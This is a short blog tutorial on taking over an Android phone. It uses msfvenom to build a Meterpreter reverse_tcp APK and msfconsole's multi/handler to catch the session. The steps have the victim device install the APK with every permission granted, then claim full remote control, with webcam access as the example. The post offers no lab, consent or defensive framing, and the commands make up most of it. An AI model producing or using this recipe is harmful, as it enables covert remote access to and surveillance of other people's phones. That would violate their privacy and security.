Exploiting Android using "msfvenom'' and "msfconsole''

STEP 1 :- Go to the Kali Linux terminal and type the following command as shown below :- 

msfvenom -p android/meterpreter/reverse_tcp lhost=your IP of Kali lport=8080 > exploit name.apk




STEP 2 :- Now the apk file is created so move it to your Android phone .

STEP 3 :- Now type the following commands as follows :- 

msfconsole 

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost your IP of Kali

set lport 8080

exploit 






STEP 4 :- Now go the apk file location and click on the apk file from android and install it . Give all permissions to app and install it .(NOTE :- CLICK ON INSTALL ANYWAY).





STEP 5 :- After installing it click on the app and you will see that session is created in Kali Linux terminal .





STEP 6 :- Now you have all the control or you android device .

STEP 7 :- I have shown you an example by opening webcam in android device .





STEP 8 :- You can use different commands to operate the android device .Just type help in your Kali Linux terminal and you will get all commands listed down .




That's it from my side .Thank you 😊. Comments are appreciated.

Comments

  1. Op🔥🔥🔥🔥🔥🔥

    ReplyDelete

Post a Comment

Popular posts from this blog

Snort Installation & Configuration in Kali Linux

Exploiting Windows 10 using "msfvenom''and "msfconsole''